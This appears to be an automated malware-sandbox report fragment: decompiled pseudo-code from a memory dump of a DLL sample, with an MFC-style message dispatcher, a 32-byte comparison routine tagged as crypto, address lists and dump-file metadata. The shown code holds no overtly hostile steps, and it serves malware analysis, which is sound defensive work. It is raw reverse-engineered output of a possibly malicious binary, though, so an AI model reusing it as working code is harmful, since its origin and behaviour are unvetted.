												 *((intOrPtr*)(__ebp + 8)) = __edx;
												 *(__ebp + 0xc) = __ecx;
												if(__eax != 0x2a) {
													_push(__ecx);
													_push(__edx);
													L88:
													__ecx = __edi;
													__eax =  *__ebx();
													goto L106;
												}
												_push(E1000A8F0(__ebx, __ecx, __ebp, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L96;
											case 0x1e:
												_push(__esi);
												L90:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x1f:
												_push(__esi);
												_push( *(__ebp + 0xc));
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
											case 0x20:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L42:
												_push(__eax);
												goto L104;
											case 0x21:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												L92:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L93:
												_push(__eax);
												goto L96;
											case 0x22:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L95:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L96:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x23:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L6:
												__eflags = _t185;
												if(_t185 != 0) {
													goto L106;
												}
												goto L39;
											case 0x24:
												goto L106;
											case 0x25:
												__ecx = __edi;
												__eax =  *__ebx();
												__eflags = __eax;
												 *(__ebp - 0x10) = __eax;
												if(__eax == 0) {
													goto L106;
												}
												L39:
												 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
												E100095DD(_t225 - 0x14);
												_t163 = 0;
												__eflags = 0;
												goto L40;
										}
									}
									_t170 =  *(_t225 - 0x18);
									_t58 =  &(_t170[1]);
									 *_t58 = _t170[1] & 0x00000000;
									__eflags =  *_t58;
									E100095DD(_t225 - 0x14);
									goto L39;
								}
								_t173 = _t194;
								__eflags =  *(_t225 + 0x10) - _t173[2];
								if( *(_t225 + 0x10) != _t173[2]) {
									goto L25;
								}
								_t196 = _t173[1];
								 *(_t225 + 0x10) = _t196;
								E100095DD(_t225 - 0x14);
								__eflags = _t196;
								if(_t196 == 0) {
									goto L39;
								}
								__eflags =  *(_t225 + 8) - 0xc000;
								if( *(_t225 + 8) < 0xc000) {
									goto L29;
								}
								goto L102;
							}
							__eflags =  *(_t147 + 0x74);
							if( *(_t147 + 0x74) <= 0) {
								goto L20;
							}
							__eflags = _t189 - 0x200;
							if(_t189 < 0x200) {
								L16:
								__eflags = _t189 - 0x100;
								if(_t189 < 0x100) {
									L18:
									__eflags = _t189 - 0x281 - 0x10;
									if(_t189 - 0x281 > 0x10) {
										goto L20;
									}
									L19:
									_t177 =  *((intOrPtr*)( *( *(_t222 + 0x4c)) + 0x94))(_t189,  *((intOrPtr*)(_t225 + 0xc)), _t224, _t225 - 0x10);
									__eflags = _t177;
									if(_t177 != 0) {
										goto L106;
									}
									goto L20;
								}
								__eflags = _t189 - 0x10f;
								if(_t189 <= 0x10f) {
									goto L19;
								}
								goto L18;
							}
							__eflags = _t189 - 0x209;
							if(_t189 <= 0x209) {
								goto L19;
							}
							goto L16;
						} else {
							_t181 = E1000BFBD(_t189, _t222, _t222, _t224, _t224 >> 0x10);
							__eflags = _t181;
							if(_t181 != 0) {
								L2:
								 *((intOrPtr*)(_t225 - 0x10)) = 1;
								L106:
								_t160 =  *((intOrPtr*)(_t225 + 0x14));
								if(_t160 != 0) {
									 *_t160 =  *((intOrPtr*)(_t225 - 0x10));
								}
								 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
								E100095DD(_t225 - 0x14);
								_t163 = 1;
								L40:
								return E1001FC9C(_t163);
							}
							goto L12;
						}
					}
					_t217 =  *(_t225 + 0x10);
					__eflags =  *_t217;
					if( *_t217 == 0) {
						goto L39;
					}
					_push(_t225 - 0x10);
					_push(_t217);
					_push( *((intOrPtr*)(_t225 + 0xc)));
					_t185 =  *((intOrPtr*)( *__ecx + 0xec))();
					goto L6;
				}
				_push( *(_t225 + 0x10));
				_push( *((intOrPtr*)(_t225 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0xe8))() == 0) {
					goto L39;
				}
				goto L2;
			}

0x1000c578
0x1000c578
0x1000c57f
0x1000c584
0x1000c588
0x1000c58b
0x1000c592
0x1000c59b
0x1000c59e
0x1000c5c2
0x1000c5c5
0x1000c5f1
0x1000c5f4
0x1000c5f7
0x1000c604
0x1000c604
0x1000c609
0x1000c60c
0x1000c622
0x1000c622
0x1000c625
0x1000c627
0x1000c676
0x1000c67a
0x1000c687
0x1000c690
0x1000c69b
0x1000c6a1
0x1000c6a3
0x1000c6a6
0x1000c6d6
0x1000c6d6
0x1000c6d9
0x1000c6df
0x1000c6e1
0x1000c770
0x1000c770
0x1000c773
0x00000000
0x00000000
0x1000c6e9
0x1000c6f0
0x1000c6f2
0x1000c6f4
0x1000c738
0x1000c73d
0x1000c75b
0x1000c760
0x1000c762
0x1000c764
0x00000000
0x00000000
0x1000c746
0x1000c748
0x1000ca59
0x1000ca5c
0x1000ca61
0x1000ca61
0x1000ca64
0x1000ca64
0x1000ca65
0x1000ca68
0x1000ca6a
0x1000ca6c
0x1000ca6c
0x00000000
0x1000ca6c
0x1000c74e
0x1000c750
0x1000c752
0x1000c757
0x1000c757
0x1000c75a
0x1000c75a
0x1000c766
0x1000c769
0x1000c76b
0x1000c76d
0x00000000
0x1000c76d
0x1000c6f6
0x1000c6f9
0x1000c6fc
0x1000c701
0x1000c703
0x1000c706
0x00000000
0x00000000
0x1000c70b
0x1000c711
0x1000c716
0x1000c71f
0x1000c722
0x1000c725
0x00000000
0x00000000
0x1000c72b
0x00000000
0x1000c7ae
0x1000c7b6
0x00000000
0x00000000
0x1000c7c0
0x00000000
0x00000000
0x1000c7da
0x1000c7dc
0x1000c7dc
0x1000c7df
0x1000c7e0
0x1000c7e3
0x1000c7e7
0x00000000
0x00000000
0x1000c7f6
0x1000c7fa
0x00000000
0x00000000
0x1000c801
0x1000c7b7
0x1000c7b7
0x1000c7b9
0x00000000
0x00000000
0x1000c804
0x1000c80c
0x1000c80f
0x1000c812
0x1000c816
0x1000c819
0x1000c81e
0x1000c820
0x1000c824
0x1000c828
0x1000c82b
0x1000c830
0x1000c832
0x1000c834
0x1000c837
0x1000c839
0x1000c83e
0x1000c841
0x1000c846
0x1000c848
0x1000c84a
0x1000c84a
0x1000c848
0x1000c84d
0x1000c84d
0x1000c850
0x1000c851
0x1000c852
0x1000c855
0x1000c856
0x1000c858
0x1000c85a
0x1000c85e
0x1000c862
0x1000c865
0x1000c868
0x1000c86c
0x00000000
0x00000000
0x1000c873
0x1000c87b
0x1000c87e
0x1000c881
0x1000c884
0x1000c887
0x1000c888
0x1000c88a
0x1000c88e
0x1000c890
0x1000c890
0x1000c890
0x1000c894
0x1000c897
0x1000c897
0x1000c89a
0x1000c89e
0x00000000
0x00000000
0x1000c8a8
0x1000c8ab
0x1000c8ab
0x1000c8ae
0x1000c8b0
0x00000000
0x00000000
0x1000c8c2
0x1000c8c5
0x1000c8c6
0x00000000
0x00000000
0x00000000
0x00000000
0x1000c8cf
0x1000c8d5
0x1000c8d6
0x1000c8d9
0x1000c8b5
0x1000c8b5
0x1000c8b6
0x1000c7ec
0x1000c7ec
0x1000c7ed
0x1000c7ef
0x00000000
0x00000000
0x1000c9dc
0x00000000
0x00000000
0x1000c8e7
0x00000000
0x00000000
0x1000c8de
0x1000c8e0
0x00000000
0x00000000
0x1000c8f2
0x1000c8f5
0x1000c8f6
0x00000000
0x00000000
0x1000c901
0x1000c904
0x1000c907
0x1000c908
0x00000000
0x00000000
0x1000c915
0x1000c916
0x00000000
0x00000000
0x1000c7d4
0x1000c9dd
0x1000c9dd
0x00000000
0x00000000
0x1000c7c5
0x1000c7c7
0x00000000
0x00000000
0x1000c926
0x1000c92d
0x1000c92e
0x1000c930
0x1000c933
0x00000000
0x00000000
0x1000c93b
0x1000c93e
0x00000000
0x00000000
0x1000c945
0x1000c948
0x00000000
0x00000000
0x1000c951
0x1000c954
0x1000c957
0x1000c958
0x1000c95b
0x1000c95c
0x1000c95f
0x00000000
0x00000000
0x1000c969
0x00000000
0x00000000
0x1000c96e
0x1000c96f
0x1000c96f
0x1000c974
0x1000c974
0x00000000
0x00000000
0x1000c97c
0x1000c97d
0x00000000
0x00000000
0x1000c982
0x1000c985
0x1000c988
0x1000c98b
0x1000c98c
0x1000c98c
0x1000c990
0x00000000
0x00000000
0x1000c997
0x1000c99b
0x1000c9a0
0x1000c9a0
0x00000000
0x00000000
0x1000c9a6
0x1000c9a9
0x1000c9ab
0x00000000
0x00000000
0x1000c9b2
0x1000c9b5
0x1000c9b8
0x1000c9bb
0x1000c9be
0x1000c9c1
0x1000c9c4
0x1000c9c7
0x1000c9d8
0x1000c9d9
0x1000c9e0
0x1000c9e0
0x1000c9e2
0x00000000
0x1000c9e2
0x1000c9cf
0x1000c9d0
0x1000c9d3
0x00000000
0x00000000
0x1000c9e9
0x1000c9ea
0x1000c9ea
0x1000c9ec
0x00000000
0x00000000
0x1000ca13
0x1000ca14
0x1000ca17
0x1000ca19
0x00000000
0x00000000
0x1000c79e
0x1000c7a1
0x1000c7a4
0x1000c7a7
0x1000c7a8
0x1000c7a8
0x00000000
0x00000000
0x1000c9f0
0x1000c9f3
0x1000c9f4
0x1000c9f4
0x1000c9f7
0x1000c9f7
0x1000c9f8
0x1000c9fc
0x1000c9fc
0x00000000
0x00000000
0x1000c9ff
0x1000ca02
0x1000ca05
0x1000ca08
0x1000ca09
0x1000ca09
0x1000ca0a
0x1000ca0d
0x1000ca0d
0x1000ca0f
0x00000000
0x00000000
0x1000ca20
0x1000ca23
0x1000ca26
0x1000ca29
0x1000ca2a
0x1000ca2e
0x1000ca31
0x1000ca32
0x1000ca36
0x1000ca37
0x1000ca39
0x1000ca3b
0x1000c5e4
0x1000c5e4
0x1000c5e6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1000ca43
0x1000ca45
0x1000ca47
0x1000ca49
0x1000ca4c
0x00000000
0x00000000
0x1000c788
0x1000c788
0x1000c78f
0x1000c794
0x1000c794
0x00000000
0x00000000
0x1000c72b
0x1000c779
0x1000c77c
0x1000c77c
0x1000c77c
0x1000c783
0x00000000
0x1000c783
0x1000c6ab
0x1000c6ad
0x1000c6b0
0x00000000
0x00000000
0x1000c6b2
0x1000c6b8
0x1000c6bb
0x1000c6c0
0x1000c6c2
0x00000000
0x00000000
0x1000c6c8
0x1000c6cf
0x00000000
0x00000000
0x00000000
0x1000c6d1
0x1000c629
0x1000c62d
0x00000000
0x00000000
0x1000c62f
0x1000c635
0x1000c63f
0x1000c63f
0x1000c645
0x1000c64f
0x1000c655
0x1000c658
0x00000000
0x00000000
0x1000c65a
0x1000c668
0x1000c66e
0x1000c670
0x00000000
0x00000000
0x00000000
0x1000c670
0x1000c647
0x1000c64d
0x00000000
0x00000000
0x00000000
0x1000c64d
0x1000c637
0x1000c63d
0x00000000
0x00000000
0x00000000
0x1000c60e
0x1000c619
0x1000c61e
0x1000c620
0x1000c5b6
0x1000c5b6
0x1000ca6f
0x1000ca6f
0x1000ca74
0x1000ca79
0x1000ca79
0x1000ca7b
0x1000ca82
0x1000ca89
0x1000c796
0x1000c79b
0x1000c79b
0x00000000
0x1000c620
0x1000c60c
0x1000c5c7
0x1000c5ca
0x1000c5cc
0x00000000
0x00000000
0x1000c5d7
0x1000c5d8
0x1000c5d9
0x1000c5de
0x00000000
0x1000c5de
0x1000c5a0
0x1000c5a5
0x1000c5b0
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 1000C57F

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 758592bd947f9ed89f49b444d2d6b49d7168a7d1a1213828d1cef9458bf8adda
Instruction ID: 7615ec66150bc53aaf0bc4c2e5f29b341d11434cf83223809089c5f4b93ec14a
Opcode Fuzzy Hash: 758592bd947f9ed89f49b444d2d6b49d7168a7d1a1213828d1cef9458bf8adda
Instruction Fuzzy Hash: 0FF16E7460430EAFEB14CF54CC80EAE7BA9EF05394F108529F815AB296DB35EE41DB61

Uniqueness

Uniqueness Score: -1.00%

Function 10022164 Relevance: .4, Instructions: 384
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10022164(void* __eax, void* __ecx) {
				void* _t196;
				signed int _t197;
				void* _t200;
				signed char _t206;
				signed char _t207;
				signed char _t208;
				signed char _t210;
				signed char _t211;
				signed int _t216;
				signed int _t316;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t330;
				void* _t332;
				void* _t334;
				void* _t337;
				void* _t339;
				void* _t341;
				void* _t344;
				void* _t346;
				void* _t348;
				void* _t351;
				void* _t353;
				void* _t355;
				void* _t358;
				void* _t360;
				void* _t362;

				_t200 = __ecx;
				_t196 = __eax;
				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
					_t316 = 0;
					L17:
					if(_t316 != 0) {
						goto L1;
					}
					_t206 =  *(_t196 - 0x1b);
					if(_t206 ==  *(_t200 - 0x1b)) {
						_t316 = 0;
						L28:
						if(_t316 != 0) {
							goto L1;
						}
						_t207 =  *(_t196 - 0x17);
						if(_t207 ==  *(_t200 - 0x17)) {
							_t316 = 0;
							L39:
							if(_t316 != 0) {
								goto L1;
							}
							_t208 =  *(_t196 - 0x13);
							if(_t208 ==  *(_t200 - 0x13)) {
								_t316 = 0;
								L50:
								if(_t316 != 0) {
									goto L1;
								}
								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
									_t316 = 0;
									L61:
									if(_t316 != 0) {
										goto L1;
									}
									_t210 =  *(_t196 - 0xb);
									if(_t210 ==  *(_t200 - 0xb)) {
										_t316 = 0;
										L72:
										if(_t316 != 0) {
											goto L1;
										}
										_t211 =  *(_t196 - 7);
										if(_t211 ==  *(_t200 - 7)) {
											_t316 = 0;
											L83:
											if(_t316 != 0) {
												goto L1;
											}
											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
											if(_t319 == 0) {
												L5:
												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
												if(_t321 == 0) {
													L3:
													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
													if(_t197 != 0) {
														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
													}
													L2:
													return _t197;
												}
												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
												if(_t216 != 0) {
													L86:
													_t197 = _t216;
													goto L2;
												} else {
													goto L3;
												}
											}
											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
											if(_t216 == 0) {
												goto L5;
											}
											goto L86;
										}
										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
										if(_t323 == 0) {
											L76:
											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
											if(_t325 == 0) {
												L78:
												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
												if(_t327 == 0) {
													L80:
													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
													if(_t316 != 0) {
														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
													}
													goto L83;
												}
												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
												if(_t316 != 0) {
													goto L1;
												}
												goto L80;
											}
											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L78;
										}
										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L76;
									}
									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
									if(_t330 == 0) {
										L65:
										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
										if(_t332 == 0) {
											L67:
											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
											if(_t334 == 0) {
												L69:
												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
												if(_t316 != 0) {
													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
												}
												goto L72;
											}
											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L69;
										}
										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L67;
									}
									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L65;
								}
								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
								if(_t337 == 0) {
									L54:
									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
									if(_t339 == 0) {
										L56:
										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
										if(_t341 == 0) {
											L58:
											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
											if(_t316 != 0) {
												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											}
											goto L61;
										}
										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L58;
									}
									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L56;
								}
								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L54;
							}
							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
							if(_t344 == 0) {
								L43:
								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
								if(_t346 == 0) {
									L45:
									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
									if(_t348 == 0) {
										L47:
										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
										if(_t316 != 0) {
											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
										}
										goto L50;
									}
									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L47;
								}
								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L45;
							}
							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L43;
						}
						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
						if(_t351 == 0) {
							L32:
							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
							if(_t353 == 0) {
								L34:
								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
								if(_t355 == 0) {
									L36:
									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
									if(_t316 != 0) {
										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
									}
									goto L39;
								}
								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L36;
							}
							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L34;
						}
						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L32;
					}
					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
					if(_t358 == 0) {
						L21:
						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
						if(_t360 == 0) {
							L23:
							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
							if(_t362 == 0) {
								L25:
								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
								if(_t316 != 0) {
									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
								}
								goto L28;
							}
							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L25;
						}
						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L23;
					}
					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
					if(_t316 != 0) {
						goto L1;
					}
					goto L21;
				} else {
					__edx =  *(__ecx - 0x1f) & 0x000000ff;
					__esi =  *(__eax - 0x1f) & 0x000000ff;
					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
					if(__esi == 0) {
						L10:
						__esi =  *(__eax - 0x1e) & 0x000000ff;
						__edx =  *(__ecx - 0x1e) & 0x000000ff;
						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
						if(__esi == 0) {
							L12:
							__esi =  *(__eax - 0x1d) & 0x000000ff;
							__edx =  *(__ecx - 0x1d) & 0x000000ff;
							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
							if(__esi == 0) {
								L14:
								__esi =  *(__eax - 0x1c) & 0x000000ff;
								__edx =  *(__ecx - 0x1c) & 0x000000ff;
								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L17;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L14;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L12;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L10;
				}
				L1:
				_t197 = _t316;
				goto L2;
			}

0x10022164
0x10022164
0x1002216a
0x100221ea
0x100221ec
0x100221ee
0x00000000
0x00000000
0x100221f4
0x100221fa
0x10022279
0x1002227b
0x1002227d
0x00000000
0x00000000
0x10022283
0x10022289
0x10022308
0x1002230a
0x1002230c
0x00000000
0x00000000
0x10022312
0x10022318
0x10022397
0x10022399
0x1002239b
0x00000000
0x00000000
0x100223a7
0x10022427
0x10022429
0x1002242b
0x00000000
0x00000000
0x10022431
0x10022437
0x100224b6
0x100224b8
0x100224ba
0x00000000
0x00000000
0x100224c0
0x100224c6
0x10022545
0x10022547
0x10022549
0x00000000
0x00000000
0x10022557
0x10022559
0x1002213c
0x10022144
0x10022146
0x10021d22
0x10021d2a
0x10021d2c
0x10021d3d
0x10021d3d
0x10021932
0x1002268e
0x1002268e
0x10022153
0x10022159
0x10022572
0x10022572
0x00000000
0x1002215f
0x00000000
0x1002215f
0x10022159
0x10022566
0x1002256c
0x00000000
0x00000000
0x00000000
0x1002256c
0x100224cf
0x100224d1
0x100224e8
0x100224f0
0x100224f2
0x10022509
0x10022511
0x10022513
0x1002252a
0x10022532
0x10022534
0x10022541
0x10022541
0x00000000
0x10022534
0x10022520
0x10022524
0x00000000
0x00000000
0x00000000
0x10022524
0x100224ff
0x10022503
0x00000000
0x00000000
0x00000000
0x10022503
0x100224de
0x100224e2
0x00000000
0x00000000
0x00000000
0x100224e2
0x10022440
0x10022442
0x10022459
0x10022461
0x10022463
0x1002247a
0x10022482
0x10022484
0x1002249b
0x100224a3
0x100224a5
0x100224b2
0x100224b2
0x00000000
0x100224a5
0x10022491
0x10022495
0x00000000
0x00000000
0x00000000
0x10022495
0x10022470
0x10022474
0x00000000
0x00000000
0x00000000
0x10022474
0x1002244f
0x10022453
0x00000000
0x00000000
0x00000000
0x10022453
0x100223b1
0x100223b3
0x100223ca
0x100223d2
0x100223d4
0x100223eb
0x100223f3
0x100223f5
0x1002240c
0x10022414
0x10022416
0x10022423
0x10022423
0x00000000
0x10022416
0x10022402
0x10022406
0x00000000
0x00000000
0x00000000
0x10022406
0x100223e1
0x100223e5
0x00000000
0x00000000
0x00000000
0x100223e5
0x100223c0
0x100223c4
0x00000000
0x00000000
0x00000000
0x100223c4
0x10022321
0x10022323
0x1002233a
0x10022342
0x10022344
0x1002235b
0x10022363
0x10022365
0x1002237c
0x10022384
0x10022386
0x10022393
0x10022393
0x00000000
0x10022386
0x10022372
0x10022376
0x00000000
0x00000000
0x00000000
0x10022376
0x10022351
0x10022355
0x00000000
0x00000000
0x00000000
0x10022355
0x10022330
0x10022334
0x00000000
0x00000000
0x00000000
0x10022334
0x10022292
0x10022294
0x100222ab
0x100222b3
0x100222b5
0x100222cc
0x100222d4
0x100222d6
0x100222ed
0x100222f5
0x100222f7
0x10022304
0x10022304
0x00000000
0x100222f7
0x100222e3
0x100222e7
0x00000000
0x00000000
0x00000000
0x100222e7
0x100222c2
0x100222c6
0x00000000
0x00000000
0x00000000
0x100222c6
0x100222a1
0x100222a5
0x00000000
0x00000000
0x00000000
0x100222a5
0x10022203
0x10022205
0x1002221c
0x10022224
0x10022226
0x1002223d
0x10022245
0x10022247
0x1002225e
0x10022266
0x10022268
0x10022275
0x10022275
0x00000000
0x10022268
0x10022254
0x10022258
0x00000000
0x00000000
0x00000000
0x10022258
0x10022233
0x10022237
0x00000000
0x00000000
0x00000000
0x10022237
0x10022212
0x10022216
0x00000000
0x00000000
0x00000000
0x1002216c
0x1002216c
0x10022170
0x10022174
0x10022176
0x1002218d
0x1002218d
0x10022191
0x10022195
0x10022197
0x100221ae
0x100221ae
0x100221b2
0x100221b6
0x100221b8
0x100221cf
0x100221cf
0x100221d3
0x100221d7
0x100221d9
0x100221df
0x100221e2
0x100221e6
0x100221e6
0x00000000
0x100221d9
0x100221be
0x100221c1
0x100221c5
0x100221c9
0x00000000
0x00000000
0x00000000
0x100221c9
0x1002219d
0x100221a0
0x100221a4
0x100221a8
0x00000000
0x00000000
0x00000000
0x100221a8
0x1002217c
0x1002217f
0x10022183
0x10022187
0x00000000
0x00000000
0x00000000
0x10022187
0x1002155d
0x1002155d
0x00000000

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
